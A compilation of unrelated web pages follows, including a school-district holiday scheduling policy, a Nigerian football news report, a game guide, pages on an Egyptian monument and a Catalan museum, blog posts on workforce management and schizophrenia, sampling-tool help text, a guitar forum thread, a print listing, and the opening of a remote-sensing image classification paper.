ASD serves a diverse population and takes pride in our sensitivity to the various cultures that live in our community. As a public school system we are required by the U.S. Constitution to maintain religious neutrality. We should neither encourage nor discourage religious activity.
The following guidelines and resources are an attempt to more clearly articulate current policy and offer assistance to ASD employees in determining the appropriateness of school activities as they relate to important events and activities around religious holidays and cultural dates of significance.
-
Dates on which activities* cannot be scheduled
In order to maximize student involvement in school activities and to accommodate the needs of students and families, no after-school activity shall be scheduled or hosted by the district on the dates listed below.
*Activities include but are not limited to: sports team competitions, school open houses, academic competitions, dances, student performances, retreats and student government conferences. This prohibition does not include regular practices or regular club meetings.
The following are days on which activities shall not be scheduled. The board may add or subtract from this list at a single board meeting as long as the action is on the agenda and properly noticed in advance. [Anchorage School Board policy 350.2]
U.S. holidays Observance2019-20 2020-21 2021-22
Thanksgiving Day
11/28/2019 11/26/2020 11/25/2021 New Year's Day 1/1/2020 1/1/2021 1/1/2022 Religion Observance2019-20 2020-21 2021-22 Christianity
Christmas
12/25/2019 12/25/2020 12/25/2021 Good Friday 4/10/2020 4/2/2021 4/15/2022 Easter 4/12/2020 4/4/2021 4/17/2022 Christianity/ Orthodox
Christmas
1/7/2020 1/7/2021 1/7/2022 Easter/Pascha 4/19/2020 5/2/21 4/24/2022 Islam
Eid al Fitr (Breaking of Fast)
5/23/*-5/24 5/12*-5/13 5/2*-5/3 Eid al Adha (Feast of Sacrifice) 8/10*-8/11 7/30*-7/31 7/19*-7/20
Judaism
Rosh Hashana (New Year)
9/29*-10/1 9/18*-9/20 9/6*-9/8
Yom Kippur (Day of Atonement)
10/8*-10/9 9/27*-9/28 9/15*-9/16 Pesach (Passover) 4/8*-4/10 3/27*-3/29 4/15*-4/17
ˆThese holidays begin at sundown the previous day. Passover lasts seven days (while some observe eight), however our local Jewish community considers the first two days the most important for seders.
+These holidays begin at sundown the previous day. The Islamic calendar is based on lunar observation. Dates may vary based on local lunar sightings; visit www.alaskamasjid.com for more information. | https://www.asdk12.org/site/Default.aspx?PageID=7989 |
Gombe – It was a mixed bag as some residents of Gombe reacted to the re-engagement of Stephen Keshi as Head Coach of the senior National team, the Super Eagles.
While some condemned his re-engagement, others welcomed it with a caution that he should not fail the nation again.
They warned that he should not populate the Eagles with players, particularly the foreign-based, who would not make the first team, now branded the “benchwarmers’’ .
Benchwarmers, in local parlance refer to those who would be invited only to end up seating out of the reserve bench because of the inability to make the first team.
Halilu Teli, the Gombe State chairman of the Sport Writers Association of Nigeria (SWAN) described the Keshi’s performance as head coach as a total failure.
Teli told the News Agency of Nigeria (NAN) in Gombe on Thursday that he could have preferred a foreign coach, who would not be willing to allow interference from the NFA.
“To be sincere I do not see Keshi performing a magic because he failed in the past.
“Going by the recent football ranking in Africa, Nigeria dropped from 6th to 7th position,’’ he said.
According to him, a foreign coach will give his terms. There will be no sentiments in the selection of players.
“Most of the players he invites from abroad are `benchwarmers’, at their various clubs; favoritism will not take Nigeria anywhere,” he said.
Faruk Yarma, chairman Gombe State Sport Commission, however, said Keshi was a captain of the national team for long time and had done his best.
He said if they want him to achieve, Nigerians must exercise patience.
“Remember he assisted Amodu Shaibu in the past and even though there were complaints that he did not respect his employers,” he said.
Yarma suggested that the coach should be given free hand to perform better, while cautioning that the players should also be disciplined whenever available for national assignments.
“I am sure things will work well for a desired goal to be achieved,” he said.
The Chairman, Gombe Football Association, Auwal Umar said the re-engagement of Keshi was okay.
“I am sure failure will not be tolerated, if he did not perform, his contract should be terminated and a competent hand should replace him,’’ he said.
Tanimu Umar, an Assistant General Manager, Publicity, Gombe United FC said as far as he was concerned, Keshi remained the best indigenous coach.
“I am sure he will improve on the deteriorating performance of the team,” he said
Abubakar Maina, Board member nationwide football league commended NFA for re-engaging Keshi, saying: “the issue of continuity is paramount when you are talking of anything in life. | https://sundiatapost.com/mixed-reactions-in-gombe-as-nfa-re-engages-keshi/ |
Transferring from one faculty to another will not be successful.
Players must make two crucial decisions at the very beginning of the Hogwarts Legacy: First, you will have to familiarize yourself with the Sorting Hat and choose a faculty, and then we will go to Hogsmeade, where our wizard will receive his own wand.
The Sorting Hat asks two questions during the ceremony. The first, concerning preferences and expectations, does not play a role – you may choose either the "I would like to explore the castle as soon as possible" or the "I would like to start learning as soon as possible."
On the second question, the player chooses a faculty:
Gryffindor's Courage. Ravenclaw's Loyalty. Slytherin's Ambition.
note: After answering the question, you may change your mind and choose the faculty again. However, in the future, changing the faculty will not be an option.
Firstly, the faculty's ability to enter the corresponding living room is dependent on the student. Secondly, the House influences the character's appearance: certain garments will be colored in the same shades as the house.
Moreover, each faculty member has a unique job. There are no other similarities between departments.
The player is invited to collect their own magic wand during a visit to Ollivander. There are many customization options: you can modify the length, flexibility, core, etc. In the future, it will be possible to modify the handles of the wand.
The stick's design may be influenced by your own preferences. In Hogwarts Legacy, the wand is just an accessory, not a weapon with any sort of powers or stats.
No matter what, the character's strength or ability is not tied to it in any way.
This is an interesting story. | https://list23.com/1180346-what-is-the-decision-between-wand-and-house-in-hogwarts-legacy/ |
Al Sanam -The Idol
The remains of two large stone pedestals that once supported colossi of Amenemhat III stand just north of the small village of Biahmu, some 7 Kilometers north of Fayoum .The two large pedestals somewhat ruinous, but essentially complete stone ,light yellow in color and now partly supported by Department of Antiquities bricks.
The Walk to al-Sanam is very pleasant, and the fresh ,soft ,sandy color of the pedestals ,standing about 100 meters apart, presents an attractive contrast to the rich green of the very fertile surrounding countryside.How Much more striking the scene must have been thirty-eight centuries ago, with each of the pedestals surmounted by A majestic red quartzite seated colossus of Amenemhat III.
The Pedestals Probably Stood about the same height as they do now, about 8 meters, and the colossi according to Petrie reconstruction, probably towered a further 13 meters. Each Colossus and pedestal was surmounted by an enclosure wall of the same solid blocks as the pedestals.
In the thirteenth century ce, Nabulsi saw the two colossi almost intact, one facing west, the other east, but relates that persistent rumors of hidden treasure had led to the removal of their tops. The colossi however, were solid and yielded nothing but their dignity. Nabulsi also describes a pool near the colossi reputed to cure all ills, and into which, in faith of hope, the local population threw objects and money.
In the seventeenth century, Father Vansleb saw part of one colossus, and by 1801, when Dr.Martin Visited Biahmu, The colossi have all but disappeared. In 1888, Professor Petrie removed a number of fragments and passed them on to the Ashmolean Museum in Oxford which now holds forty-seven pieces. The best preserved is the nose of one colossus, which is on display in the museum’s Egyptian Sculpture Gallery.
Other fragments were apparently left in site by Petrie, but these have since disappeared, and now no trace of the colossi remains at al Sanam.
The purpose of the colossi has not been agreed upon. It is unusual in Egypt to find statuary so completely isolated, so they have been explained as markers of a harbor on the ancient lake Moeris (though no evidence of a harbor has been found) ; as a special monument to the great achievement of Amenemhat III in the province ; or as being somehow related to the main temple of Sobek at Kiman Faris, 6 kilometers away. Christopher Kirby, Who Carried out new studies on the site in the 1990s, believes that the enclosure walls represent open-court, solar temple; the highly polished quartzite statue of the pharaoh in the center of each would have shone brilliantly in the sun. | https://fayoumegypt.com/the-pedestals-of-biahmu/ |
6 Leadership Hints for Digital Workforce Management
In this era of modernization, we can observe a drastic change in the
way we work and manage productivity. Today, we have a digital workforce and
thus employees are working freely from their digital platforms. These employees
are helping firms in saving a lot of overheads. However, they have their own
requirements and management needs. Managing this workforce in an effective
manner needs planning and exceptional skills.
Handling this great technological boom is not simple. On one hand,
digitization of the workforce brings plenty of benefits and on the other hand,
it calls for effective leadership and management.
In this article, we will discuss some effective leadership hints for
managing the digital workforce. Let us see:
Look at the final output
The old method of calculating the number of minutes an employee has
worked is totally gone. Today, we have a lot of collaborative tools and
software. These tools are used for assigning, submitting and reviewing tasks of
multiple digital workers at a time.
The digital workforce management is all about looking at the final
output without calculating the per-minute time an employee has taken for his
lunch or tea break. These tools have deadlines for each project and the
performance is calculated on the submission of each successful project on time.
Thus, the digital workforce enjoys the liberty of working with peace
without their boss standing next to their desk. Thus, the modern-day workforce
management is interested in getting the best outcome no matter how much time an
employee has given to a single project.
Communicate about the benefits of digital transformation
The digital landscape has a lot of challenges, unknowns and multiple
threats to job security. Employees who have recently been transformed into the
digital working methodology will likely feel uncomfortable and insecure about
their career growth.
Thus, it is imperative to tell them that the leader has a smart
digital strategy in hand. Today, team members want things to be discussed with
them. Rather than giving straight forward directions, we should try
communicating with them about the issues of the digital working environment and
let them give their input. In this way, the team will feel comfortable and
valued. When discussions are held in the team, it brings new ideas on to the
light.
Being a leader of the digital workforce, one should clearly discuss their
upcoming plans and strategies for the digital background. When employees know
the potential of this digital transformation,
they will actively participate in it and try to give the best.
Employees should be trained through workshops and training sessions
to adapt to this positive change and how it can help in
their career development. When they know the benefits of the digital world,
they will automatically get diverted towards it.
The traditional methods of
reward will never work
Keep in mind that the working methodology has changed drastically.
Today, the digital workforce needs something different. Gone are the days when
perks are given in the form of job titles. The digital workforce is not at all
concerned about their personal parking lots, their separate rooms and so on.
They only want flexibility and career growth.
From their leader, they want to be treated as important decision-makers
of the firm. Especially, in areas in which they have more interest or more
growth, they want to give their input and become an active part of the company’s
activities.
In short, managing a digital workforce requires exceptional
leadership skills. The digital world has a lot of challenges and complications.
However, thousands of companies are doing well with their digital workforce. By
employing the right persons, using the right strategies and following smart
rules can help us in successfully leading our workforce.
Consider fast-learners
It is the usual practice that the present skills of the employees
are evaluated before hiring them. However, this practice is not the same for
the digital workforce. Leaders of the digital workforce know that the digital
world keeps on changing with each passing day. Thus, the digital workforce
needs employees who are fast-learners and can easily grasp the tactics of the
digital arena. Thus, in comparison to the present skills, digital leaders
appreciate workers who are good at fast learning.
Make a plan of digital
ethics
Just like every firm has an ethical plan, digital leaders are
required to make an ethical plan for their digital workforce. Governance is
imperative even on the digital ground. It is because of the fact that we cannot
completely rely on machines. They work as per the data are given to them and as
per they are programmed.
There should be a set of rules for all digital workers to be
followed. Artificial intelligence has a lot of drawbacks besides its numerous
benefits. Setting an ethical plan will help the firm to stay away from the
drawbacks and make the most of its features.
Visualization dashboard
Although a digital leader is concerned about the production rather
than calculating the time spent by the employee but in certain areas like customer
relationship management, it is important to keep an eye on your digital
workforce.
For instance, a carpet cleaners London firm has an
employee for CRM. They are responsible to answer the queries of potential
clients and need to be present on a fixed schedule. What will happen if the
person is not present? The potential client will get a bad image and reputation
of the firm will suffer. Ultimately, all these potential customers will get in
touch with the competitor.
Takeaways
In short, managing a digital workforce requires exceptional leadership skills. The style and tactics of managing the digital workforce are completely different in comparison to the on-site staff. The digital world has a lot of challenges and complications. However, thousands of companies are doing well with their digital workforce. By employing the right persons, using the right strategies and following smart rules, we can successfully manage our digital workforce and create a benchmark in the digital world.
| |
Schizophrenia is a mental disorder that brings impairment in personal and professional life. Treatment of which depends on the intensity and duration of the symptoms experienced.
Symptoms of Schizophrenia
There are two categories of symptoms in schizophrenia, positive and negative. Negative symptoms show up before the positive symptoms and include flat affect, social withdrawal, and isolation called the absence of normal behavior. And positive symptoms include the presence of unusual behavior like disorganized thought, hallucinations, and delusions.
History
Until 19th-century schizophrenia was considered as a functional disorder. At the end of the 20th century, researchers made progress to discover a connection between schizophrenia- limbic system and basal ganglia deformity and dysfunction.
Parts of the brain affected in Schizophrenia are as follow:
1) Cerebral ventricles: Computed tomography (CT) scans of patients with schizophrenia consistently show lateral and third ventricular enlargement and reduction in cortical volume as compared to normal individuals. Ventricles carry cerebrospinal fluid (CSF) which protects the brain from shocks, helps remove waste and provides chemical stability in the brain. Enlarged ventricles indicate the shrinking of the brain leading to the build-up of excess CSF in the ventricles. It is however not clear whether the abnormalities detected on the CT scans are progressive or remain static.
Enlarged cerebral and lateral ventricles and shrinkage of the thalamus. Pic source: https://pin.it/3bBjCzg
2) Thalamus: Some studies involving thalamus show evidence of volume reduction or neuronal loss in a specific part of the thalamus. This result is not attributed to the use of antipsychotic drugs.
3) Reduced symmetry of the brain lobes: Reduced symmetry is attributed to originate during fetal life. There is reduced symmetry in the frontal, occipital and temporal lobe in the brain of schizophrenic patients.
4) Limbic system deformity/dysfunction: Studies of postmortem brain samples of schizophrenic patients show a reduced size of the amygdala, hippocampus, and the parahippocampal gyrus. The hippocampus is not only small in size but also functionally abnormal.
Pic source
https://www.slideshare.net/mobile/Abdo_452/schizophrenia-25734577
5) Prefrontal cortex: There is evidence from the postmortem brain inspections that point towards anatomical abnormalities in the prefrontal cortex in schizophrenia. Functional deficits in the prefrontal brain imaging regions have also be determined.
6) Basal ganglia and Cerebellum: Many patients with schizophrenia show strange movements, without the consumption of any medication that might induce movement. Basal ganglia and Cerebellum are involved in the control of movement, a disorder in these areas of the brain is attributed to schizophrenia. Studies on basal ganglia have provided inconclusive evidence about cell loss. And an abnormal increase in dopamine (neurotransmitter) activity on various synapses has been widely supported as a major cause of schizophrenia.
Loss of brain volume in schizophrenia is attributed to reduced density of axons, dendrites, and synapses that mediate associative functions of the brain.
Conclusion
The evolution of Psychology and allied fields over the years has made the diagnosis and treatment of schizophrenia possible. The detection of abnormalities within the brain wouldn’t have been possible without the aid of ever improved imaging techniques that we have today. Observable behaviors that schizophrenics display are often fearful. But the damage to the structure and function of certain parts of their brain explains why those weird behaviors are exhibited by them. It is extremely important for us to know what a person suffering from schizophrenia might be going through. This would help us understand them better and treat them right.
Please let me know of a psychology topic that you would enjoy reading and I will try to exceed your expectations.
Thank you for reading.
| |
Step 3: Analysis and Reporting
The Analysis button becomes available when a sampling plan has been chosen or newly-defined, and at least one contamination profile has been selected to be subjected to the plan. The Analysis Tools page displays the selected sampling plan and contamination profile(s), and offers 4 analysis options.
“Analyze Plan Performance” prompts the tool to produce an Operating Characteristic curve (“OC curve”), which relates each concentration along the x-axis of the between-lot distribution to a probability of acceptance (or rejection). The concentrations of the between-lot distribution represent arithmetic mean hazard concentrations (on the log10 scale) of the individual lots that make up the distribution. Each of these mean concentrations can be thought of as a “Detectable Microbial Load” (DML) that is associated with a particular probability of rejection. Using either the OC curve, or the look-up table provided (for common percentiles), or the compute button provided, the user can easily find the DML associated with any given probability of rejection, and vice versa.
Note that the “Target Probability of Rejection” defined for a sampling plan is used only to produce the value for “Detectable Microbial Load” shown on the PDF Report and on Sensitivity Analysis results.
No inputs are required.
“Design a Plan to Meet a Target” permits the user to adjust the value of one parameter of the sampling plan to attain a desired probability of rejection for a given DML (mean concentration). For example, if a desirable rejection rate for a lot with a mean concentration of -1 log10 cfu/g is 95%, but the current plan produces an OC curve that predicts a 75% probability of rejection for that concentration, then it is necessary to alter the sampling plan so that the resulting OC curve will provide the desired rejection rate. Changing the sampling plan, for example the number of samples or the value of “c”, will change the OC curve.
REQUIRED INPUTS
Target Detectable Microbial Load, in log10 cfu/gDesired Rejection Rate, in percentParameter to Vary (from a drop-down menu of available parameters)
“Study Impact on Microbial Load” requires that a between-lot distribution has been defined. The model applies the probabilities of rejection associated with the OC curve to the concentrations along the between-lot distribution, and predicts the proportion of sampled lots that will be rejected and at which concentrations. From the consideration of the microbial load of the rejected lots as compared to the microbial load in the original distribution, the proportion of microbial load remaining is calculated. This is a measure of risk reduction.
The complete list of results generated in this option is:
No inputs are required, as the percentage of lots sampled was defined in the sampling plan.
“Perform Sensitivity Analysis” permits the user to see the impact of varying an individual parameter, on both the the OC curve and the risk reduction measures (if a between-lot distribution has been defined).
The parameters that can be varied are Number of Samples, Acceptable Positives, or Analytical Sample Size in the case of presence/absence plans, and Number of Samples, Analytical Sample Size, Acceptable Number of Concentrations within Limits, Small-m, or Big-M in the case of concentration-based plans.
The user defines the range over which to vary the parameter value, and the number of values (“steps”) to be considered within that range. Results are calculated for each step. The OC curves can be shown separately or superimposed on a single graph. | http://www.fstools.org/Sampling/RunModel_ImpactofSamplingPlans_Step3.aspx |
Most performers and their bandmates, when first starting out, don’t have a clue about how to project the best guitar sound in a variety of venues, rooms, bars, and clubs.
The topic of the Public Address (PA) systems (and vocal microphones) is worthy of another blog altogether, but for now, let me give you my best advice when it comes to setting-up your guitar amplifier at a gig.
I would place the guitar amplifier on an amp stand that allows for a slight upward tilt. It would be located on the outboard edge of the stage so that it isn’t blasting directly into the microphone stand line-of-sight. The general orientation of the amp would be facing directly into the center of the room.
Volume level would be quite high, because I wouldn’t mic the amp.
Volume level would be moderate, since I would mic the amp with a Shure 58 cardioid microphone. The mic cable would be simply hung over the amp, and the mic would be laying flush against the face of the amp, mid-speaker.
That microphone would be cabled to a medium-capacity PA system, at least 300w, and its position in the cable-lineup on the PA head would be the very first after the vocal microphones. The signal would be dry in the PA, with no PA reverb applied.
Same location and general set-up as the medium venue, but I would use a Shure 57 microphone to mic the amp to the PA.
That mic would be placed in a mic-stand, and the head of the Shure 57 would be positioned 3 inches from the face of the amp speaker, at a slight (20 or 30 degree) angle. Dry signal again, and I would use a much larger PA system, at least 800w.
It’s a given that we would have at least two monitor speakers at the front of the stage, pointed back toward the drummer.
In all cases, the amp would be close enough to my body so that I can reach over and make adjustments to volume, tone, and effects settings. And it goes without saying, the amp would be close enough to me that the pedal board cable going to/from it aren’t unnecessarily long (to avoid signal degradation).
I use a pedal board with (in this order) a talk box, distortion pedal, boost pedal, phase shifter pedal, and an ElectroHarmonix Mel 9 mellotron emulator.
In a smaller venue, I run a quality cable to/from the amp and my pedal board, and at a larger venue I use my wireless rig, the Line 6 Relay G30.
That is all, I reckon.
Please share with us your advice and your experiences.
I guess for me, I don't like the amp tilted up.
The "cone of death" created where the speakers are coming right at me,, Ugh, no like!
If you're lucky enough to have a good pa/sound guy the PA has got to do the talking. amps are just for the peeps on stage.
if you're going stage mix, then that changes everything, and it's much harder to get hear what's going on once things get underway. and guitarist especially have to really work on volume control (rhythm/lead etc). | http://forum.gibson.com/index.php?/topic/132466-advice-for-staging-your-guitar-amplifier/page__p__1797520 |
Thames, a slow moving section of The River Thames reflecting the colour of the sunset.
Fine Art Giclee print using photo rag 300gsm paper and printed with archival ink set with small +/- 10mm white border.
The price for the print is £145.00 – The total shown includes £6.50 Postage and packing. | https://stephenshepherd.uk/product/thames-giclee-print/ |
The Building of the Biblioteca Museu was designed between the years 1882-1884 by the architect Jeroni Granell who concieved the building as a classical temple, crowned with a central dome and with two symmetrical wings dedicated respectively to the library and the museum. It was one of the first public buildings in Catalonia specially built to be a museum. The decorative style corresponds to a period of historical search typical of the European architecture of the end of the XIX century, with neoegiptian and neogreek ornamental repertoires with an eclectic and powerful aesthetic impact characteristic of public Catalan architecture of that time, right before the modernism was in it's very peak.
The façade is dominated by four columns and a semicircular tympanum. Engraved in the frieze below the narthex there is an inscription in Latin that says “Surge et Ambula” (Stand up and walk). Flanking the entrance there are two monumental sculptures, both of illustrious personalities from Vilanova; the romantic poet Manuel de Cabanyes (by the sculptor Josep Campeny) and the bishop Francesc Armanyá (by the sculptor Manuel Fuxá). The base relief that decorates the frontal and lateral façades are works by the artist Josep Mirabent i Gatell. In them one can see the different allegorical scenes about art and science with some details of clear masonic symbology.
The building is situated in the centre of a spacious XIX century garden created by Josep Piera and is sorrounded by a wrought iron perimeter which schematicaly reproduces the form of papyrus, continuing with the Egyptian influence.
HISTORY
The Library Museum Víctor Balaguer appeared at the end of the XIX century with the intention of offering its public the opportunity to see multiple collections of art, books and ethnography that Víctor Balaguer had accumulated during all his life. The collection consisted of objects proceeding from Catalonia as well as other cultures around the world, some from very distant countries. For the people of that time, part of the museum rooms could turn into exhibitions of exotic curiosities.
Balaguer ordered a new building to be constructed expressly to be a public museum in order to contribute to the advance of the country since Balaguer believed that culture was the base for progress in a community.
Its foundation in the year 1884 coincided with the decade known as the Gold Fever which, in the arts and museology corresponded to a period of search and revalorization of industrial arts and design that would lead to the immediate birth of the Catalan modernism.
That is why the collections that Balaguer treasured throughout his life were not aimed to be a simple accumulation of art and literature but to unite an important fund of archaeology, ethnology, ethnography, craftwork, decorative and industrial arts… that form a valuable, diverse, disperse, and extraordinarily interesting mixture of objects. In this small cosmos of objects he wanted to immerse his fellow citizens in the universality of Knowledge. | http://victorbalaguer.cat/en/node/123 |
1. Introduction {#sec1-sensors-20-01188}
===============
1.1. Background {#sec1dot1-sensors-20-01188}
---------------
Remote sensing scene classification intends to classify an image into various semantic categories by directly modeling the scenes by exploiting the variations in spatial arrangements and structural patterns \[[@B1-sensors-20-01188]\]. Remote sensing images have many categories and complicated spatial information, which make it a challenging task to effectively describe and classify remote sensing images \[[@B2-sensors-20-01188]\]. Remote sensing images play an important role in military, civil engineering, agriculture, and other fields \[[@B2-sensors-20-01188]\]. With the further development of remote sensing equipment and wireless sensor networks \[[@B3-sensors-20-01188],[@B4-sensors-20-01188],[@B5-sensors-20-01188],[@B6-sensors-20-01188]\], the way of obtaining remote sensing images is more convenient, and the demand for remote sensing scene classification is getting increasingly more urgent. Therefore, many researchers pay attention to this field \[[@B1-sensors-20-01188],[@B2-sensors-20-01188],[@B7-sensors-20-01188],[@B8-sensors-20-01188],[@B9-sensors-20-01188],[@B10-sensors-20-01188],[@B11-sensors-20-01188],[@B12-sensors-20-01188]\]. At present, many researchers use neural network technology to model remote sensing images and learn a nonlinear input--output mapping model from massive remote sensing data, thus realizing an automatic classification system of remote sensing scenes \[[@B1-sensors-20-01188],[@B2-sensors-20-01188],[@B13-sensors-20-01188]\].
Currently, the methods of remote sensing image scene classification are mainly classified into three classes based on low-level visual features, middle-level visual features, and high-level visual features. Low-level visual features include the scale-invariant feature transform (SIFT) \[[@B7-sensors-20-01188]\], histogram of oriented gradients (HOG) \[[@B8-sensors-20-01188]\], gray-level co-occurrence matrix (GLCM), etc. The low-level visual features based methods take low-level visual features as descriptors of remote sensing images \[[@B1-sensors-20-01188]\]. Generally, it is difficult for a single low-level visual feature to fully describe a scene, so researchers combine multiple low-level visual features to enhance the classification accuracy of the model \[[@B9-sensors-20-01188]\]. Those methods based on low-level visual features achieve well on some remote sensing scenes with uniform structures and spatial arrangements, but it is difficult for them to depict the high diversity and nonhomogeneous spatial distributions in remote sensing scenes \[[@B7-sensors-20-01188]\]. Unlike the low-level visual features based methods, the middle-level visual features based methods first extract local image features, such as SIFT and local binary pattern (LBP), and then encode these features to construct an overall middle-level representation for remote sensing images \[[@B1-sensors-20-01188]\]. Bag-of-visual-words (BoVW)-based methods are the most common of this kind of method \[[@B14-sensors-20-01188],[@B15-sensors-20-01188],[@B16-sensors-20-01188],[@B17-sensors-20-01188]\]. For these BoVW-based methods, various hand-crafted local image descriptors are used to represent remote sensing scenes \[[@B1-sensors-20-01188]\]. One main difficulty of such methods lies in the fact that they may lack the flexibility and adaptivity to different scenes \[[@B1-sensors-20-01188]\]. Compared to the middle-level visual features based methods, the high-level visual features based methods have a better classification performance. Compared to middle-level visual features and low-level visual features, the features extracted by the convolution neural network (CNN) are more abstract and discriminative \[[@B1-sensors-20-01188]\]. In the early research, many researchers used remote sensing datasets to directly train the network. Later, researchers found that the model pre-trained on ImageNet can obtain a better classification performance \[[@B2-sensors-20-01188]\]. Some researchers use a support vector machine (SVM) \[[@B18-sensors-20-01188]\] as a classifier to classify the features extracted by the neural network \[[@B19-sensors-20-01188],[@B20-sensors-20-01188]\]. Unlike using SVM, an end-to-end model can be constructed by using a fully connected layer for classification \[[@B2-sensors-20-01188],[@B13-sensors-20-01188]\].
1.2. Motivation {#sec1dot2-sensors-20-01188}
---------------
CNN is widely used in remote sensing scene classification \[[@B21-sensors-20-01188],[@B22-sensors-20-01188],[@B23-sensors-20-01188]\] because of its powerful feature extraction capability in various fields such as object tracking \[[@B24-sensors-20-01188],[@B25-sensors-20-01188],[@B26-sensors-20-01188]\], detection \[[@B27-sensors-20-01188]\], and classification \[[@B28-sensors-20-01188]\]. Compared to fine-tuning existing models \[[@B29-sensors-20-01188]\], many researchers focus on the design of the network model \[[@B2-sensors-20-01188],[@B13-sensors-20-01188],[@B30-sensors-20-01188]\], aiming to obtain a higher classification accuracy via additional modules. For example \[[@B13-sensors-20-01188]\], in addition to using Resnet \[[@B31-sensors-20-01188]\] to extract feature maps from the image, Zhang et al. \[[@B13-sensors-20-01188]\] designed a convolutional network to extract feature maps from attention maps \[[@B32-sensors-20-01188]\]. These feature maps will be fused with the feature maps extracted by Resnet for classification. From these works \[[@B2-sensors-20-01188],[@B13-sensors-20-01188],[@B30-sensors-20-01188]\], we find that the additional modules used at the inference stage bring about a performance improvement, but also bring about more parameters and complexity \[[@B33-sensors-20-01188],[@B34-sensors-20-01188],[@B35-sensors-20-01188]\], which may be unfavorable for deployment on devices with limited memory and computational resources \[[@B36-sensors-20-01188]\]. Therefore, it is necessary to explore how to improve the classification performance of the model without increasing the parameters.
Some works show that the diversity of data can affect the classification accuracy of the model \[[@B37-sensors-20-01188],[@B38-sensors-20-01188]\]. However, many models do not accept multi-size images as the input \[[@B1-sensors-20-01188],[@B2-sensors-20-01188],[@B13-sensors-20-01188]\], which leads to the lack of data diversity. To address this problem, we embed adaptive pooling. Under the effect of adaptive pooling, feature maps are sampled to a fixed size so that the model can process images with different sizes. After that, we scale the image at multiple scales and propose a multi-size image training strategy to ensure the diversity of images. It should be noted that our strategy only exists at the training stage and will not increase model parameters at the inference stage.
Some works only improve the classification performance of the model by embedding additional modules \[[@B2-sensors-20-01188],[@B13-sensors-20-01188]\] but ignore intra-class diversity and inter-class similarity. In order to alleviate this problem, we introduce more supervision information to guide the model to learn better features. Inspired by FaceNet \[[@B39-sensors-20-01188]\], which aims to learn a highly discriminative face feature via triplet loss, we introduce triplet loss to guide the model to learn a more discriminative remote sensing scene feature. In addition, we specially design a branch for triple loss.
Too many parameters make the network obtain good performance on the training set by memorizing the data, but the performance on the test set is very poor. The lack of generalization ability leads to overfitting of the network. Generally, neural networks have a large number of parameters. Therefore, overfitting is a serious problem in such networks \[[@B40-sensors-20-01188]\]. To address this problem, dropout \[[@B40-sensors-20-01188]\], an avoiding overfitting technique, is applied to various models \[[@B30-sensors-20-01188],[@B40-sensors-20-01188]\]. Dropout reduces the connection between neurons by randomly discarding neurons, thus weakening the correlation between neurons. The use of dropout will increase the training time \[[@B40-sensors-20-01188]\]. Unlike \[[@B30-sensors-20-01188]\] using multiple dropouts, we only use one dropout between the feature extractor and the classifier.
1.3. Main Contributions {#sec1dot3-sensors-20-01188}
-----------------------
Generally, the main contributions of our work are as follows:1)We specially design a strategy to train the network, namely, training with multi-size images. An adaptive pooling is embedded for fixing the size of the feature maps, which makes the model process images with different sizes, enabling training on images with different sizes.2)A branch dedicated to triplet loss is designed. The main purpose of this branch is to guide the model to learn a more discriminative feature vector of remote sensing scenes, thus improving the classification accuracy of the model.3)The dropout technology is utilized between the feature extractor and classifier to avoid overfitting, therefore refining the generalization capability of the model.4)Wintegrate the three modules mentioned above into the model to improve the classification accuracy without increasing parameters of model at the inference stage, and the end-to-end model that we constructed can classify the remote sensing scene well.
2. Materials and Methods {#sec2-sensors-20-01188}
========================
2.1. Materials {#sec2dot1-sensors-20-01188}
--------------
### 2.1.1. Dataset {#sec2dot1dot1-sensors-20-01188}
We perform experiments on three commonly used datasets, and some image samples are shown in [Figure 1](#sensors-20-01188-f001){ref-type="fig"}. Information about the three datasets is shown in [Table 1](#sensors-20-01188-t001){ref-type="table"}. These datasets are as follows.
Aerial image dataset (*AID*) \[[@B1-sensors-20-01188]\]. *AID* includes the following scenes: Industrial, parking, dense residential, mountain, railway station, bridge, center, storage tanks, church, pond, viaduct, baseball field, stadium, port, bare land, forest, school, desert, square, river, resort, sparse residential, commercial, playground, meadow, park, airport, farmland, medium residential, and beach.
A benchmark created by Northwestern Polytechnical University for remote sensing image scene classification (*NWPU-RESISC45*) \[[@B41-sensors-20-01188]\]. *NWPU-RESISC45* includes the following scenes: Mountain, basketball court, sparse residential, cloud, bridge, ship, medium residential, meadow, chaparral, sea ice, palace, railway station, golf course, storage tank, snowberg, forest, lake, overpass, beach, thermal power station, stadium, roundabout, church, mobile home park, commercial area, ground track field, parking lot, baseball diamond, freeway, wetland, desert, airplane, island, railway, industrial area, airport, terrace, tennis court, rectangular farmland, runway, dense residential, harbor, river, intersection, and circular farmland.
A benchmark created by the center for optical imagery analysis and learning (*OPTIMAL*) \[[@B2-sensors-20-01188]\]. *OPTIMAL* includes the following scenes: Overpass, mountain, round farmland, desert, runway, roundabout, freeway, forest, business district, square farmland, meadow, crossroads, bridge, parking lot, harbor, airport, island, bushes, beach, factory, medium houses, railway, mobile house area, church, baseball field, dense houses, playground, basketball court, golf field, lake, and airplane.
In order to effectively evaluate the performance of the model, we perform five experiments on three datasets. Details of the partition ratio of datasets are shown in [Table 2](#sensors-20-01188-t002){ref-type="table"}.
### 2.1.2. Experimental Environment {#sec2dot1dot2-sensors-20-01188}
All experiments are performed on an Ubuntu 16.04.5 LTS, and the deep learning framework used is pytorch1.3.0. The CPU of the server is Intel(R) Xeon(R) CPU E5-2640 v4 @ 2.40 GHz, and the GPU is a GeForce GTX 1080TI. The driver version of the GPU is 430.40, and the version of CUDA is 10.1.
2.2. Methods {#sec2dot2-sensors-20-01188}
------------
### 2.2.1. Overall Framework {#sec2dot2dot1-sensors-20-01188}
Our overall framework is divided into two parts: Feature extractor *f* and classifier *Classifier*. $$F = f(X),$$ $$C_{F} = Classifer(F),~$$ $$O_{F} = softmax(C_{F}).~$$
